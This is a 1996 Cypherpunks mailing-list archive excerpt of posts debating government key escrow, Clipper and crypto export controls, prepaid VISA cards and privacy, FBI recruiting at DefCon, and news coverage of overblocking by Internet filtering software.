Content-Type: text/plain


At 09:54 AM 7/30/96 -0700, Marshall Clow wrote:
>>Today, Monday, July 29, Dorothy Denning begins her debate vs. John Gilmore
>>over The Absolute Right to Privacy on Wired Online's Brain Tennis site. Do
>>citizens of the world have an "unalienable right" to privacy - or are there
>>reasons why governments ought to have access to our communications? This
>>debate will run daily through August 7. Follow along at
>>http://www.wired.com/braintennis/

>
>I noticed that she said "allows", not "would allow". That contradicts
><<I'm not ready to accept "the cat is out of the bag.">>, doesn't it?


Quite!  I wish somebody would ask her why such a tiny fraction of the 
population (government functionaries, and a small fraction of them to 
boot!) should get their way and force (with varying degrees of the word, 
force) their idea of heaven on the rest of us.  Despite their claims of an 
"emerging consensus", only an extraordinarily small group thought up GAK and 
has been promoting it.  Whatever benefits are claimed for that system, I've 
always contended that we (as citizens; or, as individuals) should have the 
right to reject it.  Are they unwilling to take NO for an answer?

 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 08:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
Message-ID: <199607302157.OAA25086@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 AM 7/30/96 -0700, Mike Duvos wrote:
>Happened to browse the VISA Web site last evening to read about
>the new microprocessor-based VISA Cash Cards that are being
>accepted in lieu of small change at the Olympics in Atlanta.
>
>While there, I noticed a new product that VISA is about to
>introduce.  Called "VISA Travel Money", it is a pre-paid card
>with a user-selected PIN which one can simply purchase at a
>participating financial institution, just like Travelers Checks.
>One can then use it at any of the 250,000 ATMs in 89 countries
>until the amount one paid for it has been extracted, after which,
>one presumedly tosses it.
>
>Since the card is pre-paid, and does not involve the extension of
>credit, I would think that a "nym" would have no difficulty in
>purchasing one.  Seems like a convenient way to keep moderate
>amounts of cash in a form which cannot be easily stolen, nor
>perused by the Feds.
>
>I wonder if an SSN is required at the time of purchase?


Even if not, chances are good that "all" of the transactions can be linked 
together, even if they can't be directly linked to an identifiable person.  
Doesn't sound too promising.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 30 Jul 1996 23:58:38 +0800
To: cypherpunks@toad.com
Subject: Returned mail.No such addressee
Message-ID: <9607301258.AA22999@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Jul 30 14:55:00 1996
To: cpunks
Date: Tue Jul 30 13:50:00 1996
Actually the archives from ftp.dsi.unimi.it have moved to:

ftp://idea.sec.dsi.unimi.it/pub/

It's a very large repository and to hell with ITAR, it's italian.

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMf4GJRFhy5sz+bTpAQHB7QgAo+IcNX+FIBW9bJsN3l9O7OIw5mFTQr+x
LsvrNsSrTx0jVJaUIaLDh1BzBme9caBYDzdJl+LfAtjufvIBJPEl2+bYVz+aWoP1
BZtfVdmL7ZR4O+z2Q5/r+mnT+Q4OZSk78Zpo9dZd3syJZa2w89DUINA3CNcCoJ8G
33Y5coB5PJZluuywozJYcENneq41lDg5k2DxP79GHyXFLBHYKj7HwO2nUei0H9//
FaXRcd9X0Qp0pKPm33lXiKNkAVSl+xtGk8F7BjYClL9F+WjZ1jaXMSKC3aImjRvP
1DeVlSsYF0Y2GYvubOTs45ueAPwVPAboDU3UXgRGblla0utlQ9kRTw==
=UYHi
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 31 Jul 1996 09:10:57 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <199607302208.PAA25781@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:02 AM 7/31/96 -0700, Timothy C. May wrote:
>Having a U.S. version, without any limits on crypto and without any
>software key escrow (GAK), and then having a "for export" version, with
>keylength limits and/or mandatory registration of keys with the U.S.
>National Security Agency....
>
>Well, what this would do is to basically drive sales of the "NSA" version
>to near zero. Between customer distaste for an NSA version, I can imagine
>many foreign governments not being too pleased to see this product being
>used by its citizens.

For over a decade, the ham radio community has been familiar with the 
phenomenon of handheld, microprocessor-drive "rice radios"  (because they're 
usually Japan-built) which contain an internal limitation keeping them from 
receiving or transmitting out of their band.  These radios are built for the 
world market, and are "programmed" by installing (or not installing) various 
diodes on a PCB.  Removing, adding, or shifting diodes is an easy trick, and 
restores full functionality to the device.

What's to prevent a software writer such as Microsoft (or anyone else, for 
that matter) from writing two versions of a program (domestic and export), 
perhaps containing a difference as minor as a two-byte EQUate representing 
the maximum number of bits that are "allowed" in the key.  Everything else 
is identical.  Making a change would be as simple as bringing up a hex 
editor and changing those bytes.   (okay, admittedly that won't seem simple 
for most people, but a simple single-purpose editor program would probably 
pop up for the purpose.)




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 15:59:35 +0800
To: cypherpunks@toad.com
Subject: Let's Say "No!" to Single, World Versions of Software
Message-ID: <ae22e61d060210044d52@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It is imperative that Netscape, Microsoft, Qualcomm, and the other players
be pressured/urged/cajoled to commit to introducing strong, unescrowed
crypto for the *domestic* versions, even if not for export versions.

I believe several signs are pointing to jockeying in the U.S. to get the
major players in software to introduce "one version" programs with key
escrow built in. While the avowed intent will be to stop _export_ of
unescrowed strong crypto, such a "one version" (interoperable) strategy
would mean that key escrow is the de facto situation within the United
States.

Several months back, during the flap over Netscape founder Jim Clarke's
statements about the needs for key escrow, one result was that Netscape
acknowledged that even if it had to have *two* versions, a domestic version
and an export version, it would not put key escrow or other GAK versions
into U.S . releases.

It bears repeating, though we all know this: There are no restrictions
whatsoever on crypto use in the United States. (The restrictions on airwave
use of codes are more complicated to analyze, and don't effect speech,
writing, normal communications, etc.)

Not compromising on what is available to U.S. users is critical. (Of
course, we all know that what is widely available to U.S. users will
quickly become available in Europe, Asia, and elsewhere. But this is no
reason, formally, to compromise on basic freedoms within the U.S.)

So, I urge you, be prepared to attack any of the major software vendors who
offer any "one version" solutions which limit the strength of crypto
available to the U.S. customers in the name of offering a single, world,
exportable version.

Without this ITAR hook, the government is currently powerless to control
crypto domestically. (Many believe such restrictions would be dismissed on
First Amendment grounds, as restrictions on the form of speech. Of course,
many also believe the ITARs will eventually be found to be
unconstitutional, at least the parts dealilng with software, technical
articles, speech, etc.)

One of the lines of my ever-expanding .sig has been "Boycott "Big Brother
Inside" software!" I added this during the Lotus Notes flap, where Lotus
honcho Ray Ozzie was proposing his "40 + 24" solution, where Lotus would
give 24 bits of the 64-bit key to the government. When I coined the logo
"Big Brother Inside," the Cypherpunks meeting after Clipper was announced
in '93, it was this kind of cozy relationship between industry and
government I was mainly commenting on.

The NSA and FBI know that recruiting Netscape, Microsoft, Novell, Lotus,
and others to implement GAK in their stupendously popular software products
is the single best way to control the spread of strong crypto.

I say we make it clear that this will not fly for U.S. versions! What kind
of GAK gets built into products intended to be exported to Albania and Iran
is of little relevance here in the U.S., where no laws give the government
permission to dictate what is in a program, or how long a key is, or
whether master keys have been duly deposited with the secret police.

Let's remind people of this.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 09:28:25 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
In-Reply-To: <199607302157.OAA25086@mail.pacifier.com>
Message-ID: <199607302214.PAA24454@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell writes:

> Even if not, chances are good that "all" of the transactions can 
> be linked together, even if they can't be directly linked to an 
> identifiable person.  Doesn't sound too promising.

I think it will be a popular product.  Sort of the credit card
equivalent of the disposable phone card.  

Since the transactions all involve the extraction of money, there
is really no record of your purchases.  The linking together of a 
number of cash wishdrawals is not that big a deal, although they
could be used to track your movements if you did them in more than
one specific location.

There is also the problem of being photographed every time you use
an ATM, if you do not wish your identity known. 

Still, for people who are not on the FBI's most wanted list, who
plan to completely exhaust the card in a single location, and who
dislike signing a huge bunch of Traveler's Checks at one time to 
buy something, it sounds like something that might be handy to have. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 31 Jul 1996 09:13:54 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Taxes in the digicash world
In-Reply-To: <199607301939.MAA08390@toad.com>
Message-ID: <Pine.SUN.3.91.960730150519.9152D-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 30 Jul 1996, Bill Stewart wrote:

> ...Ownership of land and easily traced tangibles, like houses
> and cars, still works, but isn't a big enough source of revenue 
> for current government appetites...

I think Bill needs to re-examine this statement.  If the ONLY 
source of taxes was realty, the only limit to the amount it can
be taxes is the asset base of the country's population.  Taxes
on land can be arbitrarily high just as long as the land owner
can pass his costs on to tenants and customers.  If my rent went
up five times and everything I bought increased in price ten
fold but I paid no direct taxes, would I be any worse (or better)
off?  The purpose of taxes is to fund government.  As long as
everyone thinks the suffering is pretty much evenly spread, there
are few complaints--at least until it becomes impossible to live
on what's left.

Please understand, I not for ANY taxes.  As I said to someone in
private e-mail, if it were up to me, I'd fund the last days of
the government with a going-out-of-business sale.  It would help
people make the transition and would dispose of "public" assets
in a more or less orderly fashion.  (How much am I bid for this
lovely half acre lot in beautiful Yosemite park?)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Wed, 31 Jul 1996 09:22:15 +0800
To: cypherpunks@toad.com
Subject: Re: TLAs on cypherpnks (was R
In-Reply-To: <199607302117.RAA14640@unix.asb.com>
Message-ID: <199607302229.PAA20023@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



"Deranged Mutant" <WlkngOwl@unix.asb.com> writes:
>A story I heard: During a privacy conference back when Clipper was
>first proposed (about 3 yrs ago) people were questioning an NSA rep 
>about escrow.  He started off his rebuttal by asking "Is Sternlight 
>here?" and then contined his reasoning as to why Clipper was a good 
>thing.

>Don't know if this actually happened, but I'm sure if it did some 
>here would remember it.

It happened, but that's about sci.crypt or talk.politics.crypto rather
than Cypherpunks, since David wasn't vocal here in those days.  A sci.crypt
article on CFP '94 by Jerod Tufte dated 26 Mar 94 included the transcript
of a panel discussion involving (among others) Stewart Baker, then NSA
general counsel; the panel was on 24 Mar.  Mike Godwin asked from the floor:

   You said in myth number four that we can anticipate -- and in fact NSA
   did anticipate that these technologies would become available in five
   to ten years.  People would go buy telephones, have an encryption
   button and be able to use this technology -- I think I am quoting you
   accurately -- in profoundly anti-social ways.  Isn't it true that many
   otherwise acceptable technologies can be used by individuals in
   profoundly anti-social ways including, say the printing press.  Isn't
   it in fact true that in a democratic society we make a decision to
   empower individuals knowing upfront and openly that we do so taking
   risk about society.  Isn't that in fact the case in this country?

Baker responded:

   Yes.  And first I should say, Mike, I haven't met you but I've read
   your stuff and actually, is David Sternlight here too?

   Sure you take risks and you have to look at each technology as it
   comes.  Let's take a look at cars.  Cars have advantages and risks and
   how do we deal with that.  We put license plates on every car and
   everybody has to have a license plate on their car even if they think
   it violates their First Amendment Rights to do it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 31 Jul 1996 07:30:40 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae22b81940ed@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960730152442.21358A-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jul 1996, David Sternlight wrote:

> Let those who passed basic English use the skills they were taught. Freeh
> said, and I repeated, that the system wasn't designed to prevent determined
> criminals from using robust crypto.

Yes, and the implication is this: the system was designed to prevent law 
abiding folk from using robust crypto, and to allow the TLA's and LEA's 
to snoop on them.

Ya just gotta luv ol' Lou Freeh, why it warms my heart to know his 
intentions, or was that my asshole, I get soo conf00sed sometimes.... NOT!

> You are either dense or obfuscating. The point has now been made repeatedly
> that the issue isn't the disappearance of stand-alone niche crypto, but
> prevention of robust, built-in, unescrowed crypto, transparently usable in
> exported copies of Microsoft Word, Netscape, Eudora, etc. Read the previous
> sentence until you understand it.

Gee, um, is there really that much of a difference?  Regardless of whether
he misinterpreted or missed your point, without built in strong crypto in
such staples as Word, Netscape, Eudora, etc, without easily invoked "Press
this button" transparent, but strong crypto, the issue is moot.  Joe
Sixpack won't be able to protect his privacy effectively, and so out of
Joe's lack of geek skills, Lou C. Furr Freeh can read Joe's email and his
loveletters, and listen in on Joe's phonecalls whenever he gets the urge. 

And Lou, like all his kind does have that urge.  Too often.

It seems you sir have missed THAT point.  Was it that you missed it on
purpose? Or out of ignorance?  One of the majorly useful tactics is to
make it hard for someone to use crypto - if you do, they aren't likely to
use it, this makes your, I mean Freeh's job much easier.  So what if there
are some cypherpukes out there, they're only a handfull and surely they're
easily dealt with, and easily tracked by regular means, and well, if they
get out of line, they can be dealt with.  Just have to join the list and 
watch them.

Divide and conquer.  Divide the tools Joe Sixpack would use from those 
that would make them spook-proof and you can conquer Joe's privacy easily.


==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 17:01:15 +0800
To: cypherpunks@toad.com
Subject: Re: Bush administration DT/Clipper strategy
Message-ID: <ae22f51d07021004d371@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Many thanks to Jim G. for posting this. Several things caught my eye, but
I'll only comment on one:

" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXX  The Justice view is that we should
 carefully press ahead and try to obtain a solution now.  Justice
 contends that the costs of waiting (loss of access and the cost
 to recoup) are growing rapidly, and an attempt to fix it now is
 worth the political risks."

Considering that this was written in early 1992, I think we (and others)
have done quite well to help stall this scheme for the past several years;
the black eyes gotten by the fumbled Clipper I and Clipper II schemes have
delayed and possibly derailed any hope for controlling both digital
telephony and encrytion.

(The document mentions going after digital telephony first, then tacking
the encryption problem. Whatever one thinks of the needs or issues, this
should make it clear that controlling crypto was a plan, not just the
"public consumption" story of Clipper as a purely voluntary phone system
for government contractors and the like.)

The "race to the fork in the road," aka the point of no return, is
underway. I think it is actually already too late to control crypto...too
many packages already released, too many degrees of freedom in
communication, too much "anarchy" in the Net.

If we can keep NSA and the other TLA intelligence agencies in a state of
confusion and missteps for another two years, I think the war will largely
be over. (Not in digital money and banking, for other and more complicated
reasons, but in the area of unbreakable communications.)

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 31 Jul 1996 09:59:51 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <199607302309.QAA23623@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Short review of the Fedz show at DefCon.  

Most of the San Francisco Computer Crime squad was in attendance.  SA Black and Butler's presentation was classic good cop/bad cop (respectively).  Nice quote by them in the Vegas paper about how all hackers aren't bad.  They were even doing recruiting, and had the little hacker puppies eatting out their hands for a mug, t-shirt, or minature badge. 

It wasn't determined whose surveillance goodies were being installed in the drop ceiling of the conference room at 4:30 AM.  The "hotel maintenance" guy certainly hauled ass when one of the official DefCon Goons showed up (classic textbook time for raids, black bag jobs, etc).  Tsk, tsk.  And me without any TSCM gear.

Points to the Fedz for great psy-ops (especially the quote about how the "new" FBI is more sensitive).  Points off to quite a few hackers who don't have a historical context of government abuse and are pretty damn easy to manipulate.

All in all, probably more entertaining than most shows on the Strip.

Obligatory comment on hackers compared to cypherpunks.  Zero to no  political savvy.  Extremely poor organizational and communication skills.  Nearly clueless on social issues.  These would be the hackers.  Yeah, yeah.  I know there are exceptions.  But all in all, I'd rather hang with C-punks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 10:07:11 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae242b4f7350@[192.187.162.15]>
Message-ID: <199607302312.QAA28508@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:

 > ... I've unsubscribed ...

Door.  Ass.  Bump.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 31 Jul 1996 10:41:11 +0800
To: David Kline <dkline@well.com>
Subject: Re: Dry Under the Waterfall
In-Reply-To: <Pine.SOL.3.91.960730085319.25477C-100000@well>
Message-ID: <199607302312.QAA28523@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>You make some very good points about those too unsocialized, too 
>unmotivated, too "declasse," as it were, to even enter the age of reading 
>that began 500 years ago.
>
>A question though: What about the 3 million hard-working, reading, 
>middle-class folks who have been downsized into oblivion the last three 
>years alone? What about the tens of millions of readers who had the skills
>needed for the industrial age, but not for the information age?

I am as equally tired of this cliche as DCF is in his essay of his
own pet peeve.

in a capitalist economy, labor is best/optimally utilized through 
relocation when the nature of the economy changes as ours is.
the massive *relocation* that is occuring in the workforce is in
fact an indication that our economy is moving at light speed into the
21st century.

I am tired of people that feel that the world owes them a job because
they are alive. ultimately you must work to live in this world, and
the only exceptions are those that have somehow twisted the "system"
into feeding them otherwise and bankrupting it in the process.
merely because you have a body does not mean you can provide a
valuable service to the world. what? the world is valuing supposed
"work" that involves nothing but dumbly moving one's appendages
far less? well, whose fault is that? our economy is fairer than
people want to admit-- we are seeing the signs that this is true,
not that it is false.

it has been drummed deeply into people's brains in the public educational
establishment that education is a key concept of success. and someone
gets to be 30 with few educational skills, finding it hard to 
get a job, and says, "nobody told me it would be like this"?

"downsized into oblivion"? excuse me? because someone is laid off they
evaporate? well, that is the conventional wisdom of course, in which
the concept of firing is equivalent to execution in many people's
minds.

I have talked to various people who launched into new careers by
going to school and picking up entirely new skills, perceiving their
"layoff" as an opportunity instead of as a condemnation.

a layoff is the economy saying to someone, "look, you may be a valuable
person, but in this role there is not that much value. please try, try
again". it is not a PROBLEM that people switch careers. its the natural
price of having a state-of-the-art economy.

another pet peeve of mine is PEOPLE WHO CHOOSE TO HAVE FAMILIES
that they cannot necessarily support. yes, that's right-- it's a choice
to have a family, and if you're a responsible person, you will think
long and hard about what it means to your life if you decide to have
kids and the lifetime commitment and cash it will require of you.
ask how much thought went into this "decision" of some people, and
you might be aghast. and why do they feel the government must pay them
for their own mistake in judgement?

>no serious effort at reforming 
>education and at skills retraining has ever been undertaken, and it seems 
>a better use of our tax dollars than most of the crap it's spent on now.

as DCF said, you can lead a horse to water but you can't make him
think. quite to the contrary college enrollment and student loans
by the government are up enormously over the past few decades.
also the GI bill is more popular than ever.

however like you I would like to see more transfer of funds from supporting
deadbeats funneled into the education system..

anyone who doesn't understand why our economy is moving the way it
is should read Toffler who predicted the shift far before it occured.

jobs are *not* being lost in the ultimate sense. our economy is undergoing
a fundamental shift in which new jobs are being created in categories that
defy old thinking such as within large corporations. if you only look
at large corporations as the barometer of the economy (as most people
do, encouraged by the media in a paranoid feedback loop), indeed it 
would look a lot like the world is ending.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 31 Jul 1996 10:04:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: VISA Travel Money
In-Reply-To: <199607302157.OAA25086@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960730160836.11115C-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 30 Jul 1996, jim bell wrote:

> Even if not, chances are good that "all" of the transactions
> can be linked together, even if they can't be directly linked
> to an identifiable person.   Doesn't sound too promising.

It sounds VERY promising to me.  Though I'm sure Jim's conjecture
about linking transactions is correct, I don't see how such an
aonymous payment system could not be useful in preserving privacy.
One could purchase several of these cards--preferably in the 
smallest denominations consistent with their mission.  Each card
could be used so that its audit trail left whatever impression
one wished to leave.

Of course, if you are arrested with one or more of them on you,
they could be used to tie you to times, places and activities
with which you might not wish to be associated.  Proper handling
could obviate or reduce this risk however.

It's not as anonymous as cash, but it might draw a lot less
attention in my circumstances.  I think it has a place in one's
aresenal of privacy enchancing technologies.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 31 Jul 1996 09:00:39 +0800
To: cypherpunks@toad.com
Subject: Nat'l Law Journal and The Independent on CWD and net-filters
Message-ID: <v0151010cae242d418262@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Tue, 30 Jul 1996 16:04:48 -0500
To: fight-censorship-announce@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: FC: Nat'l Law Journal and The Independent on CWD and net-filters
Sender: owner-fight-censorship-announce@vorlon.mit.edu

Attached are portions of two articles from the National Law Journal and
London's The Independent following up on the CyberWire Dispatch that Brock
and I put out earlier this month on the rather unusual behavior of
net-filtering software.

The original CWD is at:
  http://www.eff.org/pub/Publications/Declan_McCullagh/
  http://cyberwerks.com:70/cyberwire/cwd/ (eventually)

-Declan

===========================================================================

The National Law Journal
Monday, August 5, 1996
Page A13
By Ann Davis

...Civil libertarians are demanding to know: since when were the National
Organizaton for Women or the Endangered Species Coalition in the same class
as devil worshippers? How can photos posted by animal rights groups be
categorized as "gross depictions"? Caught in a dragnet of blocking software
are web sites on everything from the safe use of fireworks to safe sex,
according to a report by the Internet-based news service CyberWire
Dispatch.

To blocked groups' disappointment, however, Internet legal experts say any
lawsuit against private computer censors may be a losing proposition...
[Mike Godwin is quoted.]

...A cyber-Deep Throat recently leaked the lists to two Internet
investigative reporters, Brock N. Meeks and Declan B. McCullagh.
Blacklisted sites include a Silicon Valley council of the National Rifle
Association and Cyber High School, whose web address is similar to that of
a gay video site... [Snapshot of CyberHigh's web page included]

As a lawyer for CompuServe, Inc., Mr. Cunard meets potential legal
challenges with skepticism. The free speech angle? Implausible against a
private entity, he said. Discrimination claims? Difficult, unless you can
prove the Internet is a place of public accomodation. Tortious
interferrence? not likely, because most web site operators don't require
subscriptions and therefore don't have a duty to those who access their
sites.

===========================================================================

The Independent (London)
Monday, July 22, 1996
By Charles Arthur

REAL ALE IS TOO STRONG FOR THE AMERICAN MORALISTS

Programs to protect children from Net porn are keeping them out of
a vast range of sites, says Charles Arthur

[...]
        Since last July, programs such as Cyber Patrol, NetNanny and
Cybersitter have sold thousands of copies. Some have distribution
agreements with organisations such as BT and CompuServe. The makers boast
that their products "includes a bad site list of thousands of Wed sites
that are not suitable for children" and "allow parents to censor what their
children access on the Internet."
        So far, so good - except that many of those "banned" sites include
many British sources holding very useful or entirely innocent information.
And the morality underlying many of the bannings is very American, and
quite unlike that which a British parent might be expected to apply.
        Among the British sites on the World Wide Web which your child
would be unable to access when using the programs are the Campaign for Real
Ale (Camra), the Prison Lexicon (which provides information about penal
reform), the computing department of Queen Mary and Westfield College,
Imperial College, the University of Stirling, the Internet connection
companies Demon and Zetnet, and Telephone Information Services - which
offers weather and share reports but not sex lines.
        Between them, the programs prevent access to tens of thousands of
sites on the Internet. But they effectively apply an American system of
morals - on religion, weapons, drugs, alcohol and sex - to the data which
British children might be expected to know about, or could obtain from
newspapers.
        None of the operators of any of the sites mentioned above was aware
that they were "blocked", and all were mystified by it.  "Which
self-selected Mary Whitehouse put us on their list?" asked Iain Lowe,
research manager of Camra.
        In Camra's case, the answer is a team of researchers at
Microsystems Software, based in Farmingham, Massachusetts, which has been
selling Cyber Patrol since July 1995, and now claims 80 per cent of a
fast-growing market. "Camra's site is blocked under our code for beer,
alcohol, wine and tobacco," said Dick Gorgens, the company's chief
executive. "It was added on June 10 when it was advertising a beer
festival."
        Mr Lowe responded, "We don't promote underage drinking. But pubs in
this country are allowed to apply for childrens' certificates: all the
family can go. And we have had inquiries to our site from GCSE students
doing projects on the economics of the brewing industry."
        Mr Gorgens denied that the program was imposing American morals
onto British users. However, the panel which reviews the banning of sites
includes no Britons, although it does include representatives from the
National Rifle Association and the right-wing anti-pornography Morality in
Media group.

[...]

        "A close look at the actual range of sites blocked by these
programs shows they go far beyond just restricting 'pornography'," said
Brock Meeks, an Internet journalist and consultant who, with fellow
journalist Declan McCullough, obtained a decoded list of the sites banned
by the programs earlier this month, July, and revealed their
indiscriminate breadth in an Internet mailing list, Cyberwire Dispatch.
        Steve Robinson-Grindey, who runs the Prison Lexicon site, said "It
is effectively an electronic encyclopaedia of everything concerning prisons
and penal affairs in England and Wales. It is extensively used by schools
and universities for information. Even the People's Republic of China allow
access to the site." He thought it might be banned because "obviously they
rely on search words for filtering - in which case they would discover the
words sex, AIDS, homosexual, and so on. But they failed to realise these
words were being used in serious material."

[...]


-------------------------------------------------------------------------
fight-censorship is archived at http://fight-censorship.dementia.org/top/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 31 Jul 1996 08:32:16 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Dry Under the Waterfall
In-Reply-To: <2.2.32.19960730135447.0085571c@panix.com>
Message-ID: <199607302032.QAA03561@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> Now, even though the net is more graphical, it still lacks appeal for 95% of
> the population (or at least enough appeal to get them on to it).

Untrue, Duncan. Far more than 5% of the population is online already,
and the numbers are expanding rapidly. Soon even the semi-literate
will be on line, if only so they can get the latest pornography and
sports videos.

I agree, however, with your point that the "information have nots"
aren't going to be helped by any handout program. I have friends who
started out dirt poor using the Net from their fifth floor walkup
apartment in tenements in Hell's Kitchen with ancient used equipment,
and who now have decent jobs paying well over national average doing
-- what else -- net related work. Its entirely a question of personal
motivation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 10:40:53 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question
In-Reply-To: <Pine.SV4.3.91.960730182712.10011A-100000@larry.infi.net>
Message-ID: <199607302350.QAA01377@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:

> On Mon, 29 Jul 1996 jbugden@smtplink.alis.ca wrote:
> 
> > Think of how many of our laws are being enacted that tacitly make being
> > poor or indigent a crime.
> 
>    Horseshit. This is a poorly-disguised re-tread of one of the standard 
> lines of the Patrice Lumumba University brand of leftist agitprop.
> 
